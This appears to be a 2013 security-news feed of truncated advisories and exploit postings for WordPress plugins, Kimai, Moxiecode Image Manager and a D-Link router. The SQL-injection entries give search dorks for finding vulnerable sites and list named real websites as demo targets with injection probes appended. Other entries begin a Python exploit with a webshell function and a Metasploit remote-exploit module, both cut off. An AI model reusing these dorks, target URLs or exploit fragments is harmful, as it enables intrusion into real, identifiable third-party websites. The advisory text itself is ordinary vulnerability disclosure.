WordPress Spider Catalog Multiple Vulnerabilities

22 May 2013 - Source: http://www.mondounix.com
Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-105.html
 
 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Spider Catalog is the best WordPress catalog plugin. It is a convenient tool
for organizing the products represented on your website into catalogs. Each
product on the catalog is assigned with a relevant category, which makes it
easier for the customers to search and identify the needed products within the
catalog.
 
http://wordpress.org/extend/plugins/catalog/
http://web-dorado.com/products/wordpress-catalog.html
 
Vulnerable is current version 1.4.6, older versions...


WordPress Spider Event Calendar Multiple Vulnerabilities

22 May 2013 - Source: http://www.mondounix.com
Author: Janek Vind "waraxe"
Date: 22. May 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-104.html
 
 
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
Spider Event Calendar is a highly configurable plugin which allows you
to have multiple organized events in a calendar. This plugin is one of
the best WordPress Calendars available in the WordPress Directory. If you
have problems with organizing your WordPress Calendar events and displaying
them in a calendar format, then the Spider WordPress Calendar Plugin is the
best solution.
 
http://wordpress.org/extend/plugins/spider-event-calendar/
http://web-dorado.com/products/wordpress-calendar.html
 
Vulnerable...


WordPress Flagallery-Skins SQL Injection

22 May 2013 - Source: http://www.mondounix.com
##############
# Exploit Title : Wordpress Flagallery-skins plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Home : www.ashiyane.org
#
# Security Risk : Medium
#
# Dork : inurl:/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=[SQL]
#
#
#DEm0:
# http://www.argomentitessili.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=my-playlist%27
#
# http://kiwirootsmusic.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=recordings%27
#
# http://www.buritacaworldbeat.com/wp-content/plugins/flagallery-skins/compact_music_player/gallery.php?playlist=burisongs%27
#
#...


Kimai 0.9.2.1306-3 SQL Injection

22 May 2013 - Source: http://www.mondounix.com
# Exploit Title: Kimai 0.9.2.1306-3 SQLi
# Date: 05/20/2013
# Exploit Author: drone (@dronesec)
# Vendor Homepage: http://www.kimai.org/
# Software Link: https://downloads.sourceforge.net/project/kimai/0.9.x/kimai.0.9.2.1306-3.zip 
# Version: 0.9.2.1306-3
# Fixed in: source repositories (https://github.com/kimai/kimai)
# Tested on: Windows XP SP3, Ubuntu 12.04 (apparmor disabled)
 
"""
    This doesn't even require authentication to the
    web app, as the file is accessible to any user.
 
    Modify paths accordingly if running against Windows
 
    @dronesec
"""
from argparse import ArgumentParser
import string
import random
import urllib2
import sys
import re
 
def webshell(options,...


image2css: How to convert an image to CSS with PHP

22 May 2013 - Source: http://codesnippet.biz

image2css: How to convert an image to CSS with PHP is a post from CodeSnippet.biz


A while ago we already saw how to create a PDF using PHP (here is another example) and how to manipulate images by applying filters; a few days ago, however, I came across a neat PHP library that lets you turn an image...


Moxiecode Image Manager 3.1.5 Shell Upload

21 May 2013 - Source: http://www.mondounix.com
I want to warn you about vulnerabilities in Moxiecode Image Manager 
(MCImageManager). This is a commercial plugin for TinyMCE. This concerns both 
MCImageManager itself and all web applications which have MCImageManager in their 
bundle.
 
These are Arbitrary File Uploading vulnerabilities, which lead to Code 
Execution on IIS and Apache web servers.
 
-------------------------
Affected products:
-------------------------
 
Vulnerable are Moxiecode Image Manager 3.1.5 and previous versions.
 
-------------------------
Affected vendors:
-------------------------
 
Moxiecode
http://www.moxiecode.com
 
----------
Details:
----------
 
Arbitrary File Uploading (WASC-31):
 
http://site/path/tiny_mce/plugins/imagemanager/pages/im/index.html
 
Execution...


D-Link DIR615h OS Command Injection

21 May 2013 - Source: http://www.mondounix.com
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##
 
require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
 
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HttpServer
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
 
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'D-Link DIR615h OS Command Injection',
      'Description' => %q{
          Some D-Link Routers are vulnerable to an authenticated OS command injection...


WordPress ProPlayer Plugin SQL Injection

21 May 2013 - Source: http://www.mondounix.com
##############
# Exploit Title : WordPress ProPlayer Plugin SQL Injection
#
# Exploit Author : Ashiyane Digital Security Team
#
# Plugin Link  : http://wordpress.org/plugins/proplayer/
#
# Home : www.ashiyane.org
#
# Security Risk : High
#
# Version : 4.7.9.1
#
# Dork : inurl:wp-content/plugins/proplayer/playlist-controller.php?id=
#
# Tested on: Linux
#
##############
#Location:site/wp-content/plugins/proplayer/playlist-controller.php?id=[SQL]
#
#
#DEm0:
# http://www.andrewardizzoia.info/wp-content/plugins/proplayer/playlist-controller.php?id=32-0%27
#
# http://www.straightlinehdd.com/en/fear-no-ground/wp-content/plugins/proplayer/playlist-controller.php?id=151-0%27
#
# http://djmikewallace.com/wp-content/plugins/proplayer/playlist-controller.php?id=42-0%27
#
#...
